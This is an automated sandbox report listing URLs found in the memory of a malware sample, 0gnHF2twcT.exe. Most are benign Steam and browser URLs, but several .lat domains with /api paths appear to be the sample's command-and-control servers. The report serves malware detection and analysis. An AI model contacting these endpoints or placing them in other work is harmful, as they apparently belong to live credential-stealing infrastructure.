                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aspecteirs.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowvc
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshuaht.lat
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.stfc3
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
